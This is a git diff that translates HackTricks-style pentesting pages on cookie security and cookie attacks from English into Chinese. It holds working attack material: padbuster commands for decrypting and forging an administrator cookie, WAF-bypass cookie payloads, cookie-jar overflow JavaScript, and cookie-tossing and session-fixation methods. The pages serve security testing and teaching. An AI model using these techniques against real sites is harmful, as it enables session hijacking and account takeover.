-  - **Strict**: Restricts the cookie from being sent on third-party requests.
-  - **Lax**: Allows the cookie to be sent with GET requests initiated by third-party websites.
-  - **None**: Permits the cookie to be sent from any third-party domain.
+- `SameSite` 属性决定是否在来自第三方域的请求中发送 cookie。它提供三种设置：
+- **Strict**：限制 cookie 在第三方请求中发送。
+- **Lax**：允许 cookie 与由第三方网站发起的 GET 请求一起发送。
+- **None**：允许 cookie 从任何第三方域发送。
 
-Remember, while configuring cookies, understanding these attributes can help ensure they behave as expected across different scenarios.
+请记住，在配置 cookie 时，理解这些属性可以帮助确保它们在不同场景中按预期行为。
 
 | **Request Type** | **Example Code**                   | **Cookies Sent When** |
 | ---------------- | ---------------------------------- | --------------------- |
@@ -44,76 +44,76 @@ Remember, while configuring cookies, understanding these attributes can help ens
 | AJAX             | $.get("...")                       | NotSet\*, None        |
 | Image            | \<img src="...">                   | NetSet\*, None        |
 
-Table from [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/) and slightly modified.\
-A cookie with _**SameSite**_ attribute will **mitigate CSRF attacks** where a logged session is needed.
+表格来自 [Invicti](https://www.netsparker.com/blog/web-security/same-site-cookie-attribute-prevent-cross-site-request-forgery/) 并稍作修改。\
+具有 _**SameSite**_ 属性的 cookie 将 **减轻 CSRF 攻击**，其中需要登录会话。
 
-**\*Notice that from Chrome80 (feb/2019) the default behaviour of a cookie without a cookie samesite** **attribute will be lax** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
-Notice that temporary, after applying this change, the **cookies without a SameSite** **policy** in Chrome will be **treated as None** during the **first 2 minutes and then as Lax for top-level cross-site POST request.**
+**\*请注意，从 Chrome80（2019年2月）开始，未设置 cookie samesite 属性的 cookie 的默认行为将为 lax** ([https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/](https://www.troyhunt.com/promiscuous-cookies-and-their-impending-death-via-the-samesite-policy/)).\
+请注意，临时情况下，在应用此更改后，Chrome 中 **没有 SameSite** **策略的 cookie 将在 **前 2 分钟内被 **视为 None**，然后在顶级跨站点 POST 请求中被视为 Lax。**
 
 ## Cookies Flags
 
 ### HttpOnly
 
-This avoids the **client** to access the cookie (Via **Javascript** for example: `document.cookie`)
+这避免了 **客户端** 访问 cookie（例如通过 **Javascript**：`document.cookie`）
 
 #### **Bypasses**
 
-- If the page is **sending the cookies as the response** of a requests (for example in a **PHPinfo** page), it's possible to abuse the XSS to send a request to this page and **steal the cookies** from the response (check an example in [https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/).
-- This could be Bypassed with **TRACE** **HTTP** requests as the response from the server (if this HTTP method is available) will reflect the cookies sent. This technique is called **Cross-Site Tracking**.
-  - This technique is avoided by **modern browsers by not permitting sending a TRACE** request from JS. However, some bypasses to this have been found in specific software like sending `\r\nTRACE` instead of `TRACE` to IE6.0 SP2.
-- Another way is the exploitation of zero/day vulnerabilities of the browsers.
-- It's possible to **overwrite HttpOnly cookies** by performing a Cookie Jar overflow attack:
+- 如果页面 **作为请求的响应发送 cookie**（例如在 **PHPinfo** 页面中），可以利用 XSS 发送请求到此页面并 **窃取响应中的 cookie**（请查看 [https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/](https://hackcommander.github.io/posts/2022/11/12/bypass-httponly-via-php-info-page/) 中的示例）。
+- 这可以通过 **TRACE** **HTTP** 请求绕过，因为服务器的响应将反映发送的 cookie（如果此 HTTP 方法可用）。此技术称为 **Cross-Site Tracking**。
+- 现代浏览器通过不允许从 JS 发送 TRACE 请求来避免此技术。然而，在特定软件中发现了一些绕过方法，例如向 IE6.0 SP2 发送 `\r\nTRACE` 而不是 `TRACE`。
+- 另一种方法是利用浏览器的零日漏洞。
+- 通过执行 Cookie Jar 溢出攻击，可以 **覆盖 HttpOnly cookies**：
 
 {{#ref}}
 cookie-jar-overflow.md
 {{#endref}}
 
-- It's possible to use [**Cookie Smuggling**](./#cookie-smuggling) attack to exfiltrate these cookies
+- 可以使用 [**Cookie Smuggling**](./#cookie-smuggling) 攻击来外泄这些 cookie。
 
 ### Secure
 
-The request will **only** send the cookie in an HTTP request only if the request is transmitted over a secure channel (typically **HTTPS**).
+请求将 **仅** 在通过安全通道（通常是 **HTTPS**）传输时发送 cookie。
 
 ## Cookies Prefixes
 
-Cookies prefixed with `__Secure-` are required to be set alongside the `secure` flag from pages that are secured by HTTPS.
+以 `__Secure-` 开头的 cookie 必须与通过 HTTPS 保护的页面的 `secure` 标志一起设置。
 
-For cookies prefixed with `__Host-`, several conditions must be met:
+对于以 `__Host-` 开头的 cookie，必须满足几个条件：
 
-- They must be set with the `secure` flag.
-- They must originate from a page secured by HTTPS.
-- They are forbidden from specifying a domain, preventing their transmission to subdomains.
-- The path for these cookies must be set to `/`.
+- 必须设置 `secure` 标志。
+- 必须来自通过 HTTPS 保护的页面。
+- 禁止指定域，防止其传输到子域。
+- 这些 cookie 的路径必须设置为 `/`。
 
-It is important to note that cookies prefixed with `__Host-` are not allowed to be sent to superdomains or subdomains. This restriction aids in isolating application cookies. Thus, employing the `__Host-` prefix for all application cookies can be considered a good practice for enhancing security and isolation.
+重要的是要注意，以 `__Host-` 开头的 cookie 不允许发送到超级域或子域。此限制有助于隔离应用程序 cookie。因此，使用 `__Host-` 前缀为所有应用程序 cookie 被视为增强安全性和隔离性的良好做法。
 
 ### Overwriting cookies
 
-So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...:
+因此，`__Host-` 前缀 cookie 的保护之一是防止它们被子域覆盖。例如，防止 [**Cookie Tossing attacks**](cookie-tossing.md)。在演讲 [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) 中，展示了可以通过欺骗解析器从子域设置 \_\_HOST- 前缀的 cookie，例如，在开头或结尾添加 "="：
 
 <figure><img src="../../images/image (6) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies:
+或者在 PHP 中，可以在 cookie 名称的 **开头添加其他字符**，这些字符将被 **替换为下划线** 字符，从而允许覆盖 `__HOST-` cookies：
 
 <figure><img src="../../images/image (7) (1) (1) (1) (1).png" alt="" width="373"><figcaption></figcaption></figure>
 
 ## Cookies Attacks
 
-If a custom cookie contains sensitive data check it (specially if you are playing a CTF), as it might be vulnerable.
+如果自定义 cookie 包含敏感数据，请检查它（特别是如果您正在进行 CTF），因为它可能存在漏洞。
 
 ### Decoding and Manipulating Cookies
 
-Sensitive data embedded in cookies should always be scrutinized. Cookies encoded in Base64 or similar formats can often be decoded. This vulnerability allows attackers to alter the cookie's content and impersonate other users by encoding their modified data back into the cookie.
+嵌入 cookie 的敏感数据应始终受到审查。以 Base64 或类似格式编码的 cookie 通常可以被解码。这种漏洞允许攻击者更改 cookie 的内容，并通过将其修改后的数据重新编码回 cookie 来冒充其他用户。
 
 ### Session Hijacking
 
-This attack involves stealing a user's cookie to gain unauthorized access to their account within an application. By using the stolen cookie, an attacker can impersonate the legitimate user.
+此攻击涉及窃取用户的 cookie，以获得对其在应用程序中的帐户的未授权访问。通过使用被盗的 cookie，攻击者可以冒充合法用户。
 
 ### Session Fixation
 
-In this scenario, an attacker tricks a victim into using a specific cookie to log in. If the application does not assign a new cookie upon login, the attacker, possessing the original cookie, can impersonate the victim. This technique relies on the victim logging in with a cookie supplied by the attacker.
+在这种情况下，攻击者诱使受害者使用特定的 cookie 登录。如果应用程序在登录时不分配新 cookie，攻击者持有原始 cookie，可以冒充受害者。此技术依赖于受害者使用攻击者提供的 cookie 登录。
 
-If you found an **XSS in a subdomain** or you **control a subdomain**, read:
+如果您在 **子域中发现了 XSS** 或您 **控制一个子域**，请阅读：
 
 {{#ref}}
 cookie-tossing.md
@@ -121,9 +121,9 @@ cookie-tossing.md
 
 ### Session Donation
 
-Here, the attacker convinces the victim to use the attacker's session cookie. The victim, believing they are logged into their own account, will inadvertently perform actions in the context of the attacker's account.
+在这里，攻击者说服受害者使用攻击者的会话 cookie。受害者相信他们已登录自己的帐户，将无意中在攻击者的帐户上下文中执行操作。
 
-If you found an **XSS in a subdomain** or you **control a subdomain**, read:
+如果您在 **子域中发现了 XSS** 或您 **控制一个子域**，请阅读：
 
 {{#ref}}
 cookie-tossing.md
@@ -131,121 +131,108 @@ cookie-tossing.md
 
 ### [JWT Cookies](../hacking-jwt-json-web-tokens.md)
 
-Click on the previous link to access a page explaining possible flaws in JWT.
+点击上面的链接访问解释 JWT 可能存在缺陷的页面。
 
-JSON Web Tokens (JWT) used in cookies can also present vulnerabilities. For in-depth information on potential flaws and how to exploit them, accessing the linked document on hacking JWT is recommended.
+用于 cookie 的 JSON Web Tokens (JWT) 也可能存在漏洞。有关潜在缺陷及其利用方式的深入信息，建议访问有关黑客 JWT 的链接文档。
 
 ### Cross-Site Request Forgery (CSRF)
 
-This attack forces a logged-in user to execute unwanted actions on a web application in which they're currently authenticated. Attackers can exploit cookies that are automatically sent with every request to the vulnerable site.
+此攻击迫使已登录用户在他们当前已认证的 Web 应用程序上执行不必要的操作。攻击者可以利用自动随每个请求发送到易受攻击站点的 cookie。
 
 ### Empty Cookies
 
-(Check further details in the[original research](https://blog.ankursundara.com/cookie-bugs/)) Browsers permit the creation of cookies without a name, which can be demonstrated through JavaScript as follows:
-
+（请查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)中的更多详细信息）浏览器允许创建没有名称的 cookie，这可以通过 JavaScript 进行演示，如下所示：
 ```js
 document.cookie = "a=v1"
 document.cookie = "=test value;" // Setting an empty named cookie
 document.cookie = "b=v2"
 ```
-
-The result in the sent cookie header is `a=v1; test value; b=v2;`. Intriguingly, this allows for the manipulation of cookies if an empty name cookie is set, potentially controlling other cookies by setting the empty cookie to a specific value:
-
+发送的 cookie 头中的结果是 `a=v1; test value; b=v2;`。有趣的是，如果设置了一个空名称的 cookie，这允许对 cookies 进行操控，通过将空 cookie 设置为特定值，可能控制其他 cookies：
 ```js
 function setCookie(name, value) {
-  document.cookie = `${name}=${value}`
+document.cookie = `${name}=${value}`
 }
 
 setCookie("", "a=b") // Setting the empty cookie modifies another cookie's value
 ```
-
-This leads to the browser sending a cookie header interpreted by every web server as a cookie named `a` with a value `b`.
+这导致浏览器发送一个 cookie 头，每个 web 服务器将其解释为名为 `a`，值为 `b` 的 cookie。
 
 #### Chrome Bug: Unicode Surrogate Codepoint Issue
 
-In Chrome, if a Unicode surrogate codepoint is part of a set cookie, `document.cookie` becomes corrupted, returning an empty string subsequently:
-
+在 Chrome 中，如果 Unicode 代理代码点是设置的 cookie 的一部分，`document.cookie` 将变得损坏，随后返回一个空字符串：
 ```js
 document.cookie = "\ud800=meep"
 ```
+这导致 `document.cookie` 输出一个空字符串，表明永久性损坏。
 
-This results in `document.cookie` outputting an empty string, indicating permanent corruption.
-
-#### Cookie Smuggling Due to Parsing Issues
-
-(Check further details in the[original research](https://blog.ankursundara.com/cookie-bugs/)) Several web servers, including those from Java (Jetty, TomCat, Undertow) and Python (Zope, cherrypy, web.py, aiohttp, bottle, webob), mishandle cookie strings due to outdated RFC2965 support. They read a double-quoted cookie value as a single value even if it includes semicolons, which should normally separate key-value pairs:
+#### 由于解析问题导致的 Cookie 走私
 
+(查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)的更多细节) 一些网络服务器，包括 Java（Jetty, TomCat, Undertow）和 Python（Zope, cherrypy, web.py, aiohttp, bottle, webob），由于对过时的 RFC2965 支持，错误处理 cookie 字符串。它们将双引号括起来的 cookie 值视为单个值，即使它包含分号，而分号通常应分隔键值对：
 ```
 RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";
 ```
-
 #### Cookie Injection Vulnerabilities
 
-(Check further details in the[original research](https://blog.ankursundara.com/cookie-bugs/)) The incorrect parsing of cookies by servers, notably Undertow, Zope, and those using Python's `http.cookie.SimpleCookie` and `http.cookie.BaseCookie`, creates opportunities for cookie injection attacks. These servers fail to properly delimit the start of new cookies, allowing attackers to spoof cookies:
+(查看[原始研究](https://blog.ankursundara.com/cookie-bugs/)的更多细节) 服务器对 cookies 的错误解析，特别是 Undertow、Zope 以及使用 Python 的 `http.cookie.SimpleCookie` 和 `http.cookie.BaseCookie` 的服务器，创造了 cookie 注入攻击的机会。这些服务器未能正确分隔新 cookie 的开始，允许攻击者伪造 cookies：
 
-- Undertow expects a new cookie immediately after a quoted value without a semicolon.
-- Zope looks for a comma to start parsing the next cookie.
-- Python's cookie classes start parsing on a space character.
+- Undertow 期望在带引号的值后立即出现新 cookie，而不需要分号。
+- Zope 寻找逗号以开始解析下一个 cookie。
+- Python 的 cookie 类在空格字符上开始解析。
 
-This vulnerability is particularly dangerous in web applications relying on cookie-based CSRF protection, as it allows attackers to inject spoofed CSRF-token cookies, potentially bypassing security measures. The issue is exacerbated by Python's handling of duplicate cookie names, where the last occurrence overrides earlier ones. It also raises concerns for `__Secure-` and `__Host-` cookies in insecure contexts and could lead to authorization bypasses when cookies are passed to back-end servers susceptible to spoofing.
+这种漏洞在依赖基于 cookie 的 CSRF 保护的 web 应用程序中尤其危险，因为它允许攻击者注入伪造的 CSRF-token cookies，可能绕过安全措施。这个问题因 Python 对重复 cookie 名称的处理而加剧，最后一个出现的名称会覆盖之前的名称。它还引发了对不安全上下文中 `__Secure-` 和 `__Host-` cookies 的担忧，并可能导致在将 cookies 传递给易受伪造影响的后端服务器时绕过授权。
 
 ### Cookies $version and WAF bypasses
 
-According to [**this blogpost**](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie), it might be possible to use the cookie attribute **`$Version=1`** to make the backend use an old logic to parse the cookie due to the **RFC2109**. Moreover, other values just as **`$Domain`** and **`$Path`** can be used to modify the behaviour of the backend with the cookie.
+根据[**这篇博客**](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)，可能可以使用 cookie 属性 **`$Version=1`** 使后端使用旧逻辑解析 cookie，原因是 **RFC2109**。此外，其他值如 **`$Domain`** 和 **`$Path`** 可以用来修改后端对 cookie 的行为。
 
 #### Bypassing value analysis with quoted-string encoding
 
-This parsing indicate to unescape escaped values inside the cookies, so "\a" becomes "a". This can be useful to bypass WAFS as:
+这种解析表明要取消转义 cookies 内部的转义值，因此 "\a" 变为 "a"。这对于绕过 WAFS 很有用，因为：
 
 - `eval('test') => forbidden`
 - `"\e\v\a\l\(\'\t\e\s\t\'\)" => allowed`
 
 #### Bypassing cookie-name blocklists
 
-In the RFC2109 it's indicated that a **comma can be used as a separator between cookie values**. And also it's possible to add **spaces and tabs before an after the equal sign**. Therefore a cookie like `$Version=1; foo=bar, abc = qux` doesn't generate the cookie `"foo":"bar, admin = qux"` but the cookies `foo":"bar"` and `"admin":"qux"`. Notice how 2 cookies are generated and how admin got removed the space before and after the equal sign.
+在 RFC2109 中指出 **逗号可以用作 cookie 值之间的分隔符**。而且在等号前后也可以添加 **空格和制表符**。因此，像 `$Version=1; foo=bar, abc = qux` 的 cookie 不会生成 cookie `"foo":"bar, admin = qux"`，而是生成 cookies `foo":"bar"` 和 `"admin":"qux"`。注意生成了 2 个 cookies，以及 admin 在等号前后去掉了空格。
 
 #### Bypassing value analysis with cookie splitting
 
-Finally different backdoors would join in a string different cookies passed in different cookie headers like in:&#x20;
-
+最后，不同的后门会将不同的 cookies 连接成一个字符串，传递在不同的 cookie 头中，如：&#x20;
 ```
 GET / HTTP/1.1
 Host: example.com
 Cookie: param1=value1;
 Cookie: param2=value2;
 ```
-
-Which could allow to bypass a WAF like in this example:
-
+这可能允许绕过WAF，如此示例所示：
 ```
 Cookie: name=eval('test//
 Cookie: comment')
 
 Resulting cookie: name=eval('test//, comment') => allowed
 ```
+### 额外的易受攻击的 Cookie 检查
 
-### Extra Vulnerable Cookies Checks
+#### **基本检查**
 
-#### **Basic checks**
+- **cookie** 每次 **登录** 时都是 **相同** 的。
+- 登出并尝试使用相同的 cookie。
+- 尝试在 2 个设备（或浏览器）上使用相同的 cookie 登录同一账户。
+- 检查 cookie 中是否有任何信息并尝试修改它。
+- 尝试创建多个几乎相同用户名的账户，并检查是否可以看到相似之处。
+- 检查是否存在 "**记住我**" 选项以查看其工作原理。如果存在并且可能存在漏洞，请始终使用 "**记住我**" 的 cookie，而不使用其他 cookie。
+- 检查即使在更改密码后，之前的 cookie 是否仍然有效。
 
-- The **cookie** is the **same** every time you **login**.
-- Log out and try to use the same cookie.
-- Try to log in with 2 devices (or browsers) to the same account using the same cookie.
-- Check if the cookie has any information in it and try to modify it
-- Try to create several accounts with almost the same username and check if you can see similarities.
-- Check the "**remember me**" option if it exists to see how it works. If it exists and could be vulnerable, always use the cookie of **remember me** without any other cookie.
-- Check if the previous cookie works even after you change the password.
+#### **高级 cookie 攻击**
 
-#### **Advanced cookies attacks**
+如果在登录时 cookie 保持不变（或几乎不变），这可能意味着该 cookie 与您账户的某个字段相关（可能是用户名）。然后您可以：
 
-If the cookie remains the same (or almost) when you log in, this probably means that the cookie is related to some field of your account (probably the username). Then you can:
-
-- Try to create a lot of **accounts** with usernames very **similar** and try to **guess** how the algorithm is working.
-- Try to **bruteforce the username**. If the cookie saves only as an authentication method for your username, then you can create an account with username "**Bmin**" and **bruteforce** every single **bit** of your cookie because one of the cookies that you will try will the one belonging to "**admin**".
-- Try **Padding** **Oracle** (you can decrypt the content of the cookie). Use **padbuster**.
-
-**Padding Oracle - Padbuster examples**
+- 尝试创建许多非常 **相似** 的 **账户**，并尝试 **猜测** 算法的工作原理。
+- 尝试 **暴力破解用户名**。如果 cookie 仅作为您用户名的身份验证方法保存，那么您可以创建一个用户名为 "**Bmin**" 的账户，并 **暴力破解** 您的 cookie 的每一个 **位**，因为您尝试的其中一个 cookie 将是属于 "**admin**" 的。
+- 尝试 **填充** **Oracle**（您可以解密 cookie 的内容）。使用 **padbuster**。
 
+**填充 Oracle - Padbuster 示例**
 ```bash
 padbuster <URL/path/when/successfully/login/with/cookie> <COOKIE> <PAD[8-16]>
 # When cookies and regular Base64
@@ -255,47 +242,43 @@ padbuster http://web.com/index.php u7bvLewln6PJPSAbMb5pFfnCHSEd6olf 8 -cookies a
 padBuster http://web.com/home.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
 7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6 8 -encoding 2
 ```
+Padbuster 将进行多次尝试，并会询问您哪个条件是错误条件（无效的条件）。
 
-Padbuster will make several attempts and will ask you which condition is the error condition (the one that is not valid).
-
-Then it will start decrypting the cookie (it may take several minutes)
-
-If the attack has been successfully performed, then you could try to encrypt a string of your choice. For example, if you would want to **encrypt** **user=administrator**
+然后它将开始解密 cookie（可能需要几分钟）。
 
+如果攻击成功执行，则您可以尝试加密您选择的字符串。例如，如果您想要 **encrypt** **user=administrator**。
 ```
 padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== 8 -cookies thecookie=1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== -plaintext user=administrator
 ```
-
-This execution will give you the cookie correctly encrypted and encoded with the string **user=administrator** inside.
+此执行将正确加密和编码 cookie，内部包含字符串 **user=administrator**。
 
 **CBC-MAC**
 
-Maybe a cookie could have some value and could be signed using CBC. Then, the integrity of the value is the signature created by using CBC with the same value. As it is recommended to use as IV a null vector, this type of integrity checking could be vulnerable.
+也许一个 cookie 可以有一些值，并且可以使用 CBC 签名。然后，值的完整性是使用相同值的 CBC 创建的签名。由于建议使用空向量作为 IV，这种完整性检查可能会受到攻击。
 
-**The attack**
+**攻击**
 
-1. Get the signature of username **administ** = **t**
-2. Get the signature of username **rator\x00\x00\x00 XOR t** = **t'**
-3. Set in the cookie the value **administrator+t'** (**t'** will be a valid signature of **(rator\x00\x00\x00 XOR t) XOR t** = **rator\x00\x00\x00**
+1. 获取用户名 **administ** 的签名 = **t**
+2. 获取用户名 **rator\x00\x00\x00 XOR t** 的签名 = **t'**
+3. 在 cookie 中设置值 **administrator+t'** (**t'** 将是 **(rator\x00\x00\x00 XOR t) XOR t** 的有效签名 = **rator\x00\x00\x00**)
 
 **ECB**
 
-If the cookie is encrypted using ECB it could be vulnerable.\
-When you log in the cookie that you receive has to be always the same.
+如果 cookie 使用 ECB 加密，则可能会受到攻击。\
+当您登录时，您收到的 cookie 必须始终相同。
 
-**How to detect and attack:**
+**如何检测和攻击：**
 
-Create 2 users with almost the same data (username, password, email, etc.) and try to discover some pattern inside the given cookie
+创建 2 个几乎相同数据的用户（用户名、密码、电子邮件等），并尝试发现给定 cookie 中的某些模式。
 
-Create a user called for example "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and check if there is any pattern in the cookie (as ECB encrypts with the same key every block, the same encrypted bytes could appear if the username is encrypted).
+创建一个名为 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 的用户，并检查 cookie 中是否有任何模式（由于 ECB 使用相同的密钥加密每个块，如果用户名被加密，则相同的加密字节可能会出现）。
 
-There should be a pattern (with the size of a used block). So, knowing how are a bunch of "a" encrypted you can create a username: "a"\*(size of the block)+"admin". Then, you could delete the encrypted pattern of a block of "a" from the cookie. And you will have the cookie of the username "admin".
+应该有一个模式（与使用的块的大小相同）。因此，知道一堆 "a" 是如何加密的，您可以创建一个用户名："a"\*(块的大小)+"admin"。然后，您可以从 cookie 中删除一个块的 "a" 的加密模式。您将拥有用户名 "admin" 的 cookie。
 
-## References
+## 参考
 
 - [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/)
 - [https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd](https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd)
 - [https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
index 34ae43eae..77629aa9c 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -1,10 +1,9 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**`Cookie bomb`** involves **adding a significant number of large cookies to a domain and its subdomains targeting a user**. This action results in the victim **sending oversized HTTP requests** to the server, which are subsequently **rejected by the server**. The consequence of this is the induction of a Denial of Service (DoS) specifically targeted at a user within that domain and its subdomains.
+**`Cookie bomb`** 涉及 **向一个域及其子域添加大量大型 cookies，目标是用户**。此操作导致受害者 **向服务器发送超大 HTTP 请求**，这些请求随后被 **服务器拒绝**。其结果是在该域及其子域内针对用户引发拒绝服务 (DoS)。
 
-A nice **example** can be seen in this write-up: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)
+一个很好的 **例子** 可以在这篇文章中看到: [https://hackerone.com/reports/57356](https://hackerone.com/reports/57356)
 
-And for more information, you can check this presentation: [https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)
+有关更多信息，您可以查看此演示文稿: [https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 8c4ee8556..ddcecc85c 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -1,25 +1,22 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:
-
+浏览器对每个页面可以存储的**cookie数量有限制**。因此，如果出于某种原因你需要**让一个cookie消失**，你可以**溢出cookie罐**，因为最旧的cookie会被删除。
 ```javascript
 // Set many cookies
 for (let i = 0; i < 700; i++) {
-  document.cookie = `cookie${i}=${i}; Secure`
+document.cookie = `cookie${i}=${i}; Secure`
 }
 
 // Remove all cookies
 for (let i = 0; i < 700; i++) {
-  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
+document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
 }
 ```
-
-Notice, that third party cookies pointing to a different domain won't be overwritten.
+注意，指向不同域的第三方 cookies 不会被覆盖。
 
 > [!CAUTION]
-> This attack can also be used to **overwrite HttpOnly cookies as you can delete it and then reset it with the value you want**.
+> 此攻击也可以用来**覆盖 HttpOnly cookies，因为您可以删除它，然后用您想要的值重置它**。
 >
-> Check this in [**this post with a lab**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
+> 在[**这篇带实验室的文章**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/)中检查此内容。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
index f7196fafe..049c50de0 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
@@ -2,62 +2,62 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Description
+### 描述
 
-If an attacker can **control a subdomain or the domain of a company or finds an XSS in a subdomain** he will be able to perform this attack.
+如果攻击者能够**控制一个子域或公司的域名，或者在子域中发现XSS**，他将能够执行此攻击。
 
-As it was indicated in the Cookies Hacking section, when a **cookie is set to a domain (specifying it) it will be used in the domain and subdomains.**
+正如在Cookies Hacking部分所指出的，当**cookie被设置到一个域（指定它）时，它将在该域及其子域中使用。**
 
 > [!CAUTION]
-> Therefore, **an attacker is going to be able to set to the domain and subdomains a specific cookie doing something like** `document.cookie="session=1234; Path=/app/login; domain=.example.com"`
+> 因此，**攻击者将能够设置一个特定的cookie到域和子域，执行类似于** `document.cookie="session=1234; Path=/app/login; domain=.example.com"`
 
-This can be dangerous as the attacker may be able to:
+这可能是危险的，因为攻击者可能能够：
 
-- **Fixate the cookie of the victim to the attacker's account** so if the user doesn't notice, **he will perform the actions in the attacker's account** and the attacker may obtain some interesting information (check the history of the searches of the user in the platform, the victim may set his credit card in the account...)
-- If the **cookie doesn't change after login**, the attacker may just **fixate a cookie (session-fixation)**, wait until the victim logs in and then **use that cookie to log in as the victim**.
-  - Sometimes, even if the session cookies changes, the attacker use the previous one and he will receive the new one also.
-- If the **cookie is setting some initial value** (like in flask where the **cookie** may **set** the **CSRF token** of the session and this value will be maintained after the victim logs in), the **attacker may set this known value and then abuse it** (in that scenario, the attacker may then make the user perform a CSRF request as he knows the CSRF token).
-  - Just like setting the value, the attacker could also get an unauthenticated cookie generated by the server, get the CSRF token from it and use it.
+- **将受害者的cookie固定到攻击者的账户**，因此如果用户没有注意到，**他将在攻击者的账户中执行操作**，攻击者可能获得一些有趣的信息（查看用户在平台上的搜索历史，受害者可能在账户中设置他的信用卡...）
+- 如果**cookie在登录后没有改变**，攻击者可能只需**固定一个cookie（会话固定）**，等待受害者登录，然后**使用该cookie以受害者身份登录**。
+- 有时，即使会话cookie发生变化，攻击者也会使用之前的cookie，并且他也会收到新的cookie。
+- 如果**cookie设置了一些初始值**（例如在flask中，**cookie**可能**设置**会话的**CSRF令牌**，并且该值将在受害者登录后保持），**攻击者可能设置这个已知值然后加以利用**（在这种情况下，攻击者可能会让用户执行CSRF请求，因为他知道CSRF令牌）。
+- 就像设置值一样，攻击者也可以获取服务器生成的未认证cookie，从中获取CSRF令牌并使用它。
 
-### Cookie Order
+### Cookie顺序
 
-When a browser receives two cookies with the same name **partially affecting the same scope** (domain, subdomains and path), the **browser will send both values of the cookie** when both are valid for the request.
+当浏览器接收到两个具有相同名称的cookie**部分影响相同范围**（域、子域和路径）时，**浏览器将在请求有效时发送这两个cookie的值**。
 
-Depending on who has **the most specific path** or which one is the **oldest one**, the browser will **set the value of the cookie first** and then the value of the other one like in: `Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
+根据谁具有**最具体的路径**或哪个是**最旧的**，浏览器将**首先设置cookie的值**，然后设置另一个的值，如：`Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
 
